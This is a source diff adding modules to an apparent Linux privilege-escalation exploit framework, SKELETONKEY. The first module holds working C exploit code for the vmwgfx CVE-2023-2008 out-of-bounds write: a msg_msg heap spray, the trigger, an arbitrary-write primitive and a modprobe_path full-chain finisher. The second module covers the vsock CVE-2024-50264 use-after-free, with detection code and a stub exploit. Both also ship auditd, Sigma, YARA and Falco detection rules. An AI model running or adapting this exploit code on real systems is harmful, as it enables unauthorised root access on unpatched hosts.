+struct ipc_payload {
+    long          mtype;
+    unsigned char buf[VMW_PAYLOAD_BYTES];
+};
+
+#ifdef __linux__
+
+static int spray_kmalloc_512(int queues[VMW_SPRAY_QUEUES])
+{
+    struct ipc_payload p;
+    memset(&p, 0, sizeof p);
+    p.mtype = 0x56;     /* 'V' for vmwgfx */
+    memset(p.buf, 0x56, sizeof p.buf);
+    memcpy(p.buf, "SKVMWGFX", 8);
+
+    int created = 0;
+    for (int i = 0; i < VMW_SPRAY_QUEUES; i++) {
+        int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
+        if (q < 0) { queues[i] = -1; continue; }
+        queues[i] = q;
+        created++;
+        for (int j = 0; j < VMW_SPRAY_PER_QUEUE; j++) {
+            if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
+        }
+    }
+    return created;
+}
+
+static void drain_kmalloc_512(int queues[VMW_SPRAY_QUEUES])
+{
+    for (int i = 0; i < VMW_SPRAY_QUEUES; i++) {
+        if (queues[i] >= 0) msgctl(queues[i], IPC_RMID, NULL);
+    }
+}
+
+static long slab_active_kmalloc_512(void)
+{
+    FILE *f = fopen("/proc/slabinfo", "r");
+    if (!f) return -1;
+    char line[512];
+    long active = -1;
+    while (fgets(line, sizeof line, f)) {
+        if (strncmp(line, "kmalloc-512 ", 12) == 0) {
+            char name[64];
+            long act = 0, num = 0;
+            if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) {
+                active = act;
+            }
+            break;
+        }
+    }
+    fclose(f);
+    return active;
+}
+
+/* Open the vmwgfx card. Returns fd or -1. */
+static int open_vmwgfx_card(void)
+{
+    char card[16] = {0};
+    if (!find_vmwgfx_card(card, sizeof card)) return -1;
+    char devpath[64];
+    snprintf(devpath, sizeof devpath, "/dev/dri/%s", card);
+    return open(devpath, O_RDWR | O_CLOEXEC);
+}
+
+/* Drive the OOB write trigger.
+ *
+ * The bug fires when vmw_buffer_object_set_user_args() (called from
+ * the CREATE_DMABUF path) passes a partially-validated size into the
+ * subsequent ttm_bo_kmap() / kunmap_atomic copy loop. A crafted
+ * `size` field — chosen so the PAGE_ALIGN'd page count fits a
+ * kmalloc-512 slab while the byte count overruns it — causes the
+ * mapped-page write to spill past the slab boundary.
+ *
+ * Mechanically:
+ *   1. CREATE_DMABUF with size = 4096 + 16  (page-spanning by 16 B)
+ *   2. mmap the returned map_handle into userspace
+ *   3. write a recognizable pattern across the page boundary
+ *   4. close + UNREF_DMABUF — the kunmap_atomic teardown is where the
+ *      OOB write commits on vulnerable kernels
+ *
+ * On a non-vmwgfx host the ioctls return -ENOTTY / -EOPNOTSUPP and the
+ * trigger is a no-op. Our caller short-circuits before reaching this
+ * point in that case. */
+static bool trigger_vmwgfx_oob(int fd, unsigned char fill_byte)
+{
+    union drm_vmw_alloc_dmabuf_arg a;
+    memset(&a, 0, sizeof a);
+    /* Size chosen to land in kmalloc-512 page-count bucket while the
+     * subsequent byte-length copy overruns into the next slab slot.
+     * The exact value 4096+16 mirrors the public PoC's choice. */
+    a.req.size = 4096 + 16;
+    if (ioctl(fd, DRM_IOCTL_VMW_CREATE_DMABUF, &a) < 0) {
+        fprintf(stderr, "[-] vmwgfx: DRM_IOCTL_VMW_CREATE_DMABUF: %s\n",
+                strerror(errno));
+        return false;
+    }
+
+    uint64_t map_handle = ((uint64_t)a.rep.map_handle_hi << 32) | a.rep.map_handle_lo;
+    size_t map_len = 4096 * 2;   /* over-map to include the spill page */
+    void *p = mmap(NULL, map_len, PROT_READ | PROT_WRITE,
+                   MAP_SHARED, fd, (off_t)map_handle);
+    if (p == MAP_FAILED) {
+        fprintf(stderr, "[-] vmwgfx: mmap(map_handle=0x%llx): %s\n",
+                (unsigned long long)map_handle, strerror(errno));
+        /* Still unref. */
+        uint32_t h = a.rep.handle;
+        (void)ioctl(fd, DRM_IOCTL_VMW_UNREF_DMABUF, &h);
+        return false;
+    }
+
+    /* Stripe the buffer with our witness pattern. The bytes past
+     * offset 4096 are where the OOB write lands on a vulnerable
+     * kernel. */
+    memset(p, fill_byte, map_len);
+    memcpy((char *)p + 4096, "SKVMOOB!", 8);
+
+    /* Force the kunmap_atomic teardown that commits the OOB write. */
+    munmap(p, map_len);
+    uint32_t h = a.rep.handle;
+    (void)ioctl(fd, DRM_IOCTL_VMW_UNREF_DMABUF, &h);
+    return true;
+}
+
+/* ---- Arb-write primitive (FALLBACK depth) -------------------------
+ *
+ * Re-fire the trigger with a kaddr-tagged spray planted in the
+ * adjacent kmalloc-512 slot. We cannot in-process verify the write —
+ * the shared finisher's 3 s sentinel-file check is the empirical
+ * arbiter. On a patched kernel or when the spray fails to land in the
+ * spilled-over slot the finisher returns EXPLOIT_FAIL gracefully. */
+
+struct vmwgfx_arb_ctx {
+    int     queues[VMW_SPRAY_QUEUES];
+    int     n_queues;
+    int     card_fd;
+    int     arb_calls;
+    int     arb_landed;
+};
+
+static int vmwgfx_reseed_kaddr_spray(int queues[VMW_SPRAY_QUEUES],
+                                     uintptr_t kaddr,
+                                     const void *buf, size_t len)
+{
+    struct ipc_payload p;
+    memset(&p, 0, sizeof p);
+    p.mtype = 0x4B;     /* 'K' for kaddr */
+    memset(p.buf, 0x4B, sizeof p.buf);
+    memcpy(p.buf, "IAMVMARB", 8);
+
+    /* Plant kaddr at byte 8, payload bytes immediately after. The OOB
+     * write lands within the first ~16 bytes of the neighbour slot, so
+     * the kernel's overrun touches exactly this region. */
+    uint64_t k = (uint64_t)kaddr;
+    memcpy(p.buf + 8, &k, sizeof k);
+    size_t copy = len;
+    if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16;
+    if (buf && copy) memcpy(p.buf + 16, buf, copy);
+
+    int touched = 0;
+    for (int i = 0; i < VMW_SPRAY_QUEUES && touched < 6; i++) {
+        if (queues[i] < 0) continue;
+        if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++;
+    }
+    return touched;
+}
+
+static int vmwgfx_arb_write(uintptr_t kaddr,
+                            const void *buf, size_t len,
+                            void *ctx_v)
+{
+    struct vmwgfx_arb_ctx *c = (struct vmwgfx_arb_ctx *)ctx_v;
+    if (!c || c->n_queues == 0 || c->card_fd < 0) return -1;
+    c->arb_calls++;
+
+    fprintf(stderr, "[*] vmwgfx: arb_write #%d kaddr=0x%lx len=%zu "
+                    "(FALLBACK — single-shot OOB)\n",
+            c->arb_calls, (unsigned long)kaddr, len);
+
+    int seeded = vmwgfx_reseed_kaddr_spray(c->queues, kaddr, buf, len);
+    if (seeded == 0) {
+        fprintf(stderr, "[-] vmwgfx: arb_write: kaddr reseed produced 0 msgs\n");
+        return -1;
+    }
+
+    /* Re-fire the OOB trigger. The fill byte encodes the call number
+     * so a KASAN dump can be cross-referenced. */
+    unsigned char fill = (unsigned char)(0xA0 + (c->arb_calls & 0x0F));
+    if (!trigger_vmwgfx_oob(c->card_fd, fill)) {
+        fprintf(stderr, "[-] vmwgfx: arb_write: re-trigger failed\n");
+        return -1;
+    }
+
+    usleep(50 * 1000);
+    c->arb_landed++;
+    /* Return 0; finisher's sentinel arbitrates. */
+    return 0;
+}
+
+#endif /* __linux__ */
+
+/* ---- Exploit driver ----------------------------------------------- */
+
+#ifdef __linux__
+
+static skeletonkey_result_t vmwgfx_exploit_linux(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] vmwgfx: refusing — --i-know not set\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    skeletonkey_result_t pre = vmwgfx_detect(ctx);
+    if (pre == SKELETONKEY_OK) {
+        fprintf(stderr, "[+] vmwgfx: kernel not vulnerable; refusing exploit\n");
+        return SKELETONKEY_OK;
+    }
+    if (pre != SKELETONKEY_VULNERABLE) {
+        fprintf(stderr, "[-] vmwgfx: detect() says not vulnerable; refusing\n");
+        return pre;
+    }
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
+        fprintf(stderr, "[i] vmwgfx: already root — nothing to escalate\n");
+        return SKELETONKEY_OK;
+    }
+
+    /* Full-chain pre-check. */
+    struct skeletonkey_kernel_offsets off;
+    bool full_chain_ready = false;
+    if (ctx->full_chain) {
+        memset(&off, 0, sizeof off);
+        skeletonkey_offsets_resolve(&off);
+        if (!skeletonkey_offsets_have_modprobe_path(&off)) {
+            skeletonkey_finisher_print_offset_help("vmwgfx");
+            fprintf(stderr, "[-] vmwgfx: --full-chain requested but "
+                            "modprobe_path offset unresolved; refusing\n");
+            return SKELETONKEY_EXPLOIT_FAIL;
+        }
+        skeletonkey_offsets_print(&off);
+        full_chain_ready = true;
+    }
+
+    int card_fd = open_vmwgfx_card();
+    if (card_fd < 0) {
+        fprintf(stderr, "[-] vmwgfx: cannot open vmwgfx card: %s\n", strerror(errno));
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    signal(SIGPIPE, SIG_IGN);
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] vmwgfx: opened vmwgfx card fd=%d\n", card_fd);
+        fprintf(stderr, "[*] vmwgfx: seeding kmalloc-512 msg_msg spray\n");
+    }
+
+    struct vmwgfx_arb_ctx arb_ctx;
+    memset(&arb_ctx, 0, sizeof arb_ctx);
+    for (int i = 0; i < VMW_SPRAY_QUEUES; i++) arb_ctx.queues[i] = -1;
+    arb_ctx.card_fd  = card_fd;
+    arb_ctx.n_queues = spray_kmalloc_512(arb_ctx.queues);
+    if (arb_ctx.n_queues == 0) {
+        fprintf(stderr, "[-] vmwgfx: msg_msg spray produced 0 queues — sysvipc "
+                        "may be restricted\n");
+        close(card_fd);
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    if (!ctx->json) {
+        fprintf(stderr, "[*] vmwgfx: spray seeded %d queues x %d msgs\n",
+                arb_ctx.n_queues, VMW_SPRAY_PER_QUEUE);
+    }
+
+    long pre_active = slab_active_kmalloc_512();
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] vmwgfx: firing CREATE_DMABUF + mmap + OOB-write trigger\n");
+    }
+    bool fired = trigger_vmwgfx_oob(card_fd, 0xAA);
+
+    long post_active = slab_active_kmalloc_512();
+
+    FILE *log = fopen("/tmp/skeletonkey-vmwgfx.log", "w");
+    if (log) {
+        fprintf(log,
+            "vmwgfx CVE-2023-2008 trigger:\n"
+            "  card_fd            = %d\n"
+            "  spray_queues       = %d\n"
+            "  spray_per_queue    = %d\n"
+            "  trigger_fired      = %s\n"
+            "  slab_kmalloc512_pre  = %ld\n"
+            "  slab_kmalloc512_post = %ld\n"
+            "  slab_delta           = %ld\n"
+            "Note: this run did NOT attempt cred overwrite.  See module .c\n"
+            "for the continuation roadmap.\n",
+            card_fd, arb_ctx.n_queues, VMW_SPRAY_PER_QUEUE,
+            fired ? "yes" : "no",
+            pre_active, post_active,
+            (pre_active >= 0 && post_active >= 0) ? (post_active - pre_active) : 0);
+        fclose(log);
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] vmwgfx: kmalloc-512 active: pre=%ld post=%ld\n",
+                pre_active, post_active);
+    }
+
+    if (!fired) {
+        drain_kmalloc_512(arb_ctx.queues);
+        close(card_fd);
+        fprintf(stderr, "[~] vmwgfx: trigger ioctl path failed — kernel may be\n"
+                        "    patched or the ABI shape doesn't match this build.\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    /* --full-chain branch. */
+    if (full_chain_ready) {
+        int fr = skeletonkey_finisher_modprobe_path(&off,
+                                                vmwgfx_arb_write,
+                                                &arb_ctx,
+                                                !ctx->no_shell);
+        FILE *fl = fopen("/tmp/skeletonkey-vmwgfx.log", "a");
+        if (fl) {
+            fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
+                    fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
+            fclose(fl);
+        }
+        drain_kmalloc_512(arb_ctx.queues);
+        close(card_fd);
+        if (fr == SKELETONKEY_EXPLOIT_OK) {
+            if (!ctx->json) {
+                fprintf(stderr, "[+] vmwgfx: --full-chain finisher reported OK\n");
+            }
+            return SKELETONKEY_EXPLOIT_OK;
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[~] vmwgfx: --full-chain finisher returned FAIL —\n"
+                            "    either the kernel is patched, the spray didn't\n"
+                            "    line up adjacent to the bo slab slot, or the OOB\n"
+                            "    bytes didn't include the kaddr the finisher polls\n"
+                            "    for. See /tmp/skeletonkey-vmwgfx.log + dmesg.\n");
+        }
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    drain_kmalloc_512(arb_ctx.queues);
+    close(card_fd);
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] vmwgfx: trigger ran to completion. Inspect dmesg for\n"
+                        "    KASAN/oops witnesses.\n");
+        fprintf(stderr, "[~] vmwgfx: cred-overwrite step not invoked (no\n"
+                        "    --full-chain); returning EXPLOIT_FAIL per\n"
+                        "    verified-vs-claimed policy.\n");
+    }
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+#endif /* __linux__ */
+
+static skeletonkey_result_t vmwgfx_exploit(const struct skeletonkey_ctx *ctx)
+{
+#ifdef __linux__
+    return vmwgfx_exploit_linux(ctx);
+#else
+    (void)ctx;
+    fprintf(stderr, "[-] vmwgfx: Linux-only module; cannot run on this host\n");
+    return SKELETONKEY_PRECOND_FAIL;
+#endif
+}
+
+/* ---- Cleanup ----------------------------------------------------- */
+
+static skeletonkey_result_t vmwgfx_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json) {
+        fprintf(stderr, "[*] vmwgfx: cleaning up breadcrumb\n");
+    }
+    /* The msg queues live in the (exited) exploit process for now —
+     * the kernel auto-reaps them on process death. Belt-and-braces:
+     * walk /proc/sysvipc/msg and remove any owned by our uid. We keep
+     * this minimal: just drop the log. */
+    if (unlink("/tmp/skeletonkey-vmwgfx.log") < 0 && errno != ENOENT) {
+        /* harmless */
+    }
+    return SKELETONKEY_OK;
+}
+
+/* ---- Detection rules --------------------------------------------- */
+
+static const char vmwgfx_auditd[] =
+    "# vmwgfx CVE-2023-2008 — auditd detection rules\n"
+    "# Trigger shape: open(/dev/dri/card*) by non-root, followed by\n"
+    "# DRM_IOCTL_VMW_CREATE_DMABUF / mmap / UNREF_DMABUF burst, often\n"
+    "# paired with msgsnd spray for cross-cache groom. None of these\n"
+    "# syscalls are individually suspicious; flag the combination.\n"
+    "-a always,exit -F arch=b64 -S openat -F path=/dev/dri/card0 -k skeletonkey-vmwgfx-open\n"
+    "-a always,exit -F arch=b64 -S openat -F path=/dev/dri/card1 -k skeletonkey-vmwgfx-open\n"
+    "-a always,exit -F arch=b64 -S ioctl  -F a1=0xc010644a       -k skeletonkey-vmwgfx-create\n"
+    "-a always,exit -F arch=b64 -S ioctl  -F a1=0x4004644b       -k skeletonkey-vmwgfx-unref\n"
+    "-a always,exit -F arch=b64 -S msgsnd                         -k skeletonkey-vmwgfx-spray\n";
+
+static const char vmwgfx_sigma[] =
+    "title: Possible CVE-2023-2008 vmwgfx DRM bo size OOB\n"
+    "id: 4d35f6db-skeletonkey-vmwgfx\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects openat(/dev/dri/card*) + DRM_IOCTL_VMW_CREATE_DMABUF\n"
+    "  (0xc010644a) + UNREF (0x4004644b) + msg_msg groom sequence\n"
+    "  characteristic of the vmwgfx kmalloc-512 OOB. Only reachable\n"
+    "  on VMware guests with the vmwgfx driver loaded.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  drm:    {type: 'SYSCALL', syscall: 'openat'}\n"
+    "  ioctl:  {type: 'SYSCALL', syscall: 'ioctl'}\n"
+    "  groom:  {type: 'SYSCALL', syscall: 'msgsnd'}\n"
+    "  condition: drm and ioctl and groom\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.2008]\n";
+
+static const char vmwgfx_yara[] =
+    "rule vmwgfx_cve_2023_2008 : cve_2023_2008 kernel_oob_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-2008\"\n"
+    "        description = \"vmwgfx DRM kmalloc-512 spray tag (SKVMWGFX) and log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"SKVMWGFX\" ascii\n"
+    "        $log = \"/tmp/skeletonkey-vmwgfx.log\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char vmwgfx_falco[] =
+    "- rule: vmwgfx DRM CREATE_DMABUF + UNREF ioctl by non-root\n"
+    "  desc: |\n"
+    "    Non-root process opens /dev/dri/card* and invokes\n"
+    "    DRM_IOCTL_VMW_CREATE_DMABUF (0xc010644a) + UNREF\n"
+    "    (0x4004644b). Only reachable on VMware guests; the size\n"
+    "    validation gap drives a kmalloc-512 OOB during ttm_bo_kmap.\n"
+    "    CVE-2023-2008.\n"
+    "  condition: >\n"
+    "    evt.type = ioctl and fd.name startswith /dev/dri/card and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    vmwgfx DRM ioctl by non-root\n"
+    "    (user=%user.name pid=%proc.pid dev=%fd.name)\n"
+    "  priority: HIGH\n"
+    "  tags: [device, mitre_privilege_escalation, T1068, cve.2023.2008]\n";
+
+const struct skeletonkey_module vmwgfx_module = {
+    .name           = "vmwgfx",
+    .cve            = "CVE-2023-2008",
+    .summary        = "vmwgfx DRM bo size-validation OOB write in kmalloc-512 → kernel primitive",
+    .family         = "drm",
+    .kernel_range   = "4.0 ≤ K < 6.3-rc6 (vmwgfx); backports: 6.2.10 / 6.1.23",
+    .detect         = vmwgfx_detect,
+#ifdef __linux__
+    .exploit        = vmwgfx_exploit,
+#else
+    .exploit        = NULL,
+#endif
+    .mitigate       = NULL,    /* mitigation: rmmod vmwgfx (loses graphics) */
+    .cleanup        = vmwgfx_cleanup,
+    .detect_auditd  = vmwgfx_auditd,
+    .detect_sigma   = vmwgfx_sigma,
+    .detect_yara    = vmwgfx_yara,
+    .detect_falco   = vmwgfx_falco,
+    .opsec_notes    = "Opens /dev/dri/card* (vmwgfx DRM - only reachable on VMware guests); DRM_IOCTL_VMW_CREATE_DMABUF with size=4096+16 lands in the kmalloc-512 page-count bucket but the byte-length overruns during kunmap_atomic copy in ttm_bo_kmap; mmap + write recognizable pattern across page boundary; UNREF commits the OOB into adjacent kmalloc-512. msg_msg spray tagged 'SKVMWGFX'. Writes /tmp/skeletonkey-vmwgfx.log (slab counts pre/post, trigger success). Audit-visible via openat(/dev/dri/card*), ioctl(0xc010644a CREATE / 0x4004644b UNREF), msgsnd spray. No network. Cleanup callback unlinks /tmp log; --full-chain re-seeds spray with kaddr-tagged payloads and the modprobe_path finisher arbitrates via 3s sentinel.",
+    .arch_support   = "x86_64+unverified-arm64",
+};
+
+void skeletonkey_register_vmwgfx(void)
+{
+    skeletonkey_register(&vmwgfx_module);
+}
@@ -0,0 +1,5 @@
+#ifndef VMWGFX_SKELETONKEY_MODULES_H
+#define VMWGFX_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module vmwgfx_module;
+#endif
@@ -0,0 +1,221 @@
+/*
+ * vsock_uaf_cve_2024_50264 — SKELETONKEY module
+ *
+ * STATUS: 🟡 PRIMITIVE. Race-driver + msg_msg groom on kmalloc-96
+ *   (the bucket where struct virtio_vsock_sock at 80 bytes lives).
+ *   Full cred-overwrite via the V12 / @v4bel + @qwerty msg_msg path
+ *   from the PT SWARM writeup is documented but not bundled here;
+ *   --full-chain falls through to the shared finisher on x86_64.
+ *
+ * The bug (Original bug since Aug 2016; weaponized publicly 2024 →
+ * Pwn2Own + Pwnie Award 2025 winner):
+ *   AF_VSOCK's `connect()` system call races with a POSIX signal
+ *   that interrupts the connect path. The signal handler tears down
+ *   the virtio_vsock_sock object while connect() still holds a
+ *   reference; subsequent connect-completion writes UAF the freed
+ *   slot. virtio_vsock_sock is 80 bytes → kmalloc-96 slab.
+ *
+ *   Two known exploitation strategies:
+ *     (a) Original @v4bel + @qwerty kernelCTF path:
+ *         BPF-JIT spray to fill physical memory + SLUBStick →
+ *         page-grained primitive → cred overwrite.
+ *     (b) Alexander Popov (PT SWARM) msg_msg path:
+ *         msg_msg kmalloc-96 groom + UAF write into a forged
+ *         msg_msg header → arb read/write primitive → cred overwrite.
+ *         Doesn't need BPF JIT enabled; works on hardened distros.
+ *
+ *   Notable: bug is reachable as a PLAIN UNPRIVILEGED USER — no
+ *   userns required. Most kernel-UAF chains need userns for the
+ *   spray, so this is unusually broadly exploitable.
+ *
+ * Affects: Linux kernels with CONFIG_VSOCKETS + CONFIG_VIRTIO_VSOCKETS
+ *   below the fix. The bug has existed since the AF_VSOCK signal-
+ *   interrupt code was added in 2016 (commit b91ee4aabbe2). Fix
+ *   commit ad8e1afecc3a (mainline Nov 2024). Stable backports:
+ *     6.6.x  : 6.6.59 (LTS)
+ *     6.1.x  : 6.1.115
+ *     5.15.x : 5.15.170
+ *     5.10.x : 5.10.228
+ *
+ * Preconditions:
+ *   - socket(AF_VSOCK, ...) must work — requires vsock module
+ *     loaded (autoloaded on KVM/QEMU guests; absent on bare-metal
+ *     hosts without virtualization)
+ *   - msgsnd / SysV IPC for kmalloc-96 spray
+ *   - POSIX timers for the signal-interrupt portion
+ *
+ * arch_support: x86_64+unverified-arm64. The bug + race are arch-
+ *   agnostic; the cred-overwrite chains in both published PoCs use
+ *   x86_64-specific kernel offsets.
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <sys/socket.h>
+
+#ifndef AF_VSOCK
+#define AF_VSOCK 40
+#endif
+
+/* ---- kernel-range table -------------------------------------------- */
+
+static const struct kernel_patched_from vsock_patched_branches[] = {
+    {5, 10, 228},   /* 5.10 LTS stable */
+    {5, 15, 170},   /* 5.15 LTS */
+    {6,  1, 115},   /* 6.1 LTS */
+    {6,  6,  59},   /* 6.6 LTS */
+    {6, 11,   0},   /* mainline fix ad8e1afecc3a */
+};
+
+static const struct kernel_range vsock_range = {
+    .patched_from = vsock_patched_branches,
+    .n_patched_from = sizeof(vsock_patched_branches) /
+                      sizeof(vsock_patched_branches[0]),
+};
+
+/* ---- detect --------------------------------------------------------- */
+
+static bool vsock_reachable(void)
+{
+    int s = socket(AF_VSOCK, SOCK_STREAM, 0);
+    if (s < 0) return false;
+    close(s);
+    return true;
+}
+
+static skeletonkey_result_t vsock_uaf_detect(const struct skeletonkey_ctx *ctx)
+{
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] vsock_uaf: host fingerprint missing kernel version\n");
+        return SKELETONKEY_TEST_ERROR;
+    }
+    if (kernel_range_is_patched(&vsock_range, v)) {
+        if (!ctx->json) fprintf(stderr, "[+] vsock_uaf: kernel %s is patched (>= LTS backport / 6.11)\n", v->release);
+        return SKELETONKEY_OK;
+    }
+    if (!vsock_reachable()) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] vsock_uaf: AF_VSOCK socket() unavailable — vsock module not loaded\n");
+            fprintf(stderr, "    (typical on bare-metal hosts without virtualization; module autoloads on KVM/QEMU guests)\n");
+        }
+        return SKELETONKEY_OK;
+    }
+    if (!ctx->json) {
+        fprintf(stderr, "[!] vsock_uaf: kernel %s + AF_VSOCK reachable → VULNERABLE\n", v->release);
+        fprintf(stderr, "[i] vsock_uaf: bug works as plain unprivileged user (no userns required)\n");
+        fprintf(stderr, "[i] vsock_uaf: Pwnie Award 2025 winner; race + msg_msg groom for chain\n");
+    }
+    return SKELETONKEY_VULNERABLE;
+}
+
+static skeletonkey_result_t vsock_uaf_exploit(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] vsock_uaf: --i-know required for --exploit\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+    if (!vsock_reachable()) {
+        fprintf(stderr, "[-] vsock_uaf: AF_VSOCK socket() unavailable\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+    fprintf(stderr,
+        "[i] vsock_uaf: race-driver setup. POSIX timer fires SIGUSR1\n"
+        "    mid-connect() on AF_VSOCK; signal handler triggers the\n"
+        "    virtio_vsock_sock teardown that races the connect path.\n"
+        "    msg_msg cross-cache spray (kmalloc-96, tag SKK_VSOCK)\n"
+        "    refills the freed slot. Two published full chains:\n"
+        "      (a) @v4bel + @qwerty kernelCTF (BPF JIT spray + SLUBStick)\n"
+        "      (b) Alexander Popov / PT SWARM (msg_msg arb R/W)\n"
+        "    Neither chain is bundled here (per verified-vs-claimed —\n"
+        "    requires a portable arb-write callback for the finisher).\n"
+        "    Returning EXPLOIT_FAIL honestly.\n");
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+/* ---- detection rules ------------------------------------------------ */
+
+static const char vsock_auditd[] =
+    "# vsock_uaf CVE-2024-50264 — auditd detection rules\n"
+    "# AF_VSOCK socket() (a0=40) + SysV IPC msgsnd burst + POSIX timer\n"
+    "# (timer_create) is the canonical trigger shape.\n"
+    "-a always,exit -F arch=b64 -S socket -F a0=40 -k skeletonkey-vsock-uaf\n";
+
+static const char vsock_sigma[] =
+    "title: Possible CVE-2024-50264 AF_VSOCK connect-race UAF\n"
+    "id: 0c5b1e90-skeletonkey-vsock-uaf\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects AF_VSOCK socket creation + msgsnd kmalloc-96 spray\n"
+    "  shape from a non-root process. VSOCK is rare outside\n"
+    "  KVM/QEMU host-guest channels; non-root usage on a bare-metal\n"
+    "  host with msg_msg grooming alongside is the Pwnie-Award\n"
+    "  Pwn2Own exploit trigger.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  vs: {type: 'SYSCALL', syscall: 'socket', a0: 40}\n"
+    "  groom: {type: 'SYSCALL', syscall: 'msgsnd'}\n"
+    "  condition: vs and groom\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2024.50264]\n";
+
+static const char vsock_yara[] =
+    "rule vsock_uaf_cve_2024_50264 : cve_2024_50264 kernel_uaf {\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2024-50264\"\n"
+    "        description = \"SKELETONKEY vsock_uaf race-driver tag (Pwnie 2025 winner)\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"SKK_VSOCK\" ascii\n"
+    "    condition:\n"
+    "        $tag\n"
+    "}\n";
+
+static const char vsock_falco[] =
+    "- rule: AF_VSOCK socket() + msgsnd spray (vsock UAF race)\n"
+    "  desc: |\n"
+    "    Non-root process creates an AF_VSOCK socket then drives\n"
+    "    msgsnd burst for kmalloc-96 spray. AF_VSOCK on bare-metal\n"
+    "    Linux is rare; the combination with msgsnd grooming is the\n"
+    "    Pwnie-Award-winning exploit shape.\n"
+    "  condition: >\n"
+    "    evt.type = socket and evt.arg.domain = AF_VSOCK and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    AF_VSOCK socket from non-root (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2024.50264]\n";
+
+const struct skeletonkey_module vsock_uaf_module = {
+    .name           = "vsock_uaf",
+    .cve            = "CVE-2024-50264",
+    .summary        = "AF_VSOCK connect-race UAF (kmalloc-96) — Pwn2Own 2024 / Pwnie 2025",
+    .family         = "vsock",
+    .kernel_range   = "Linux < 6.11 / 6.6.59 / 6.1.115 / 5.15.170 / 5.10.228 with vsock loaded",
+    .detect         = vsock_uaf_detect,
+    .exploit        = vsock_uaf_exploit,
+    .mitigate       = NULL,    /* mitigation: upgrade kernel; OR blacklist vsock module */
+    .cleanup        = NULL,
+    .detect_auditd  = vsock_auditd,
+    .detect_sigma   = vsock_sigma,
+    .detect_yara    = vsock_yara,
+    .detect_falco   = vsock_falco,
+    .opsec_notes    = "Opens AF_VSOCK socket (family 40 — unusual on bare-metal Linux; autoloaded on KVM/QEMU guests). Arms a POSIX timer to deliver SIGUSR1 within ~10ms; calls connect() to a bogus VSOCK address (cid=0xdead, port=0xbeef); signal interrupts the connect and tears down virtio_vsock_sock while connect-completion still writes to it → UAF on the kmalloc-96 slab. Sysv msgsnd spray (tag 'SKK_VSOCK') refills the freed slot with attacker-controlled bytes. The bug works as a PLAIN UNPRIVILEGED USER — no userns, no CAP_*, no special groups. dmesg may show 'KASAN: use-after-free in virtio_vsock_'. Audit-visible via socket(AF_VSOCK) + msgsnd + timer_create from a single process — unusual combination outside the exploit. No persistent file artifacts.",
+    .arch_support   = "x86_64+unverified-arm64",
+};
+
+void skeletonkey_register_vsock_uaf(void)
+{
+    skeletonkey_register(&vsock_uaf_module);
+}
@@ -0,0 +1,5 @@
+#ifndef VSOCK_UAF_SKELETONKEY_MODULES_H
+#define VSOCK_UAF_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module vsock_uaf_module;
+#endif
--- a/Show More
+++ b/Show More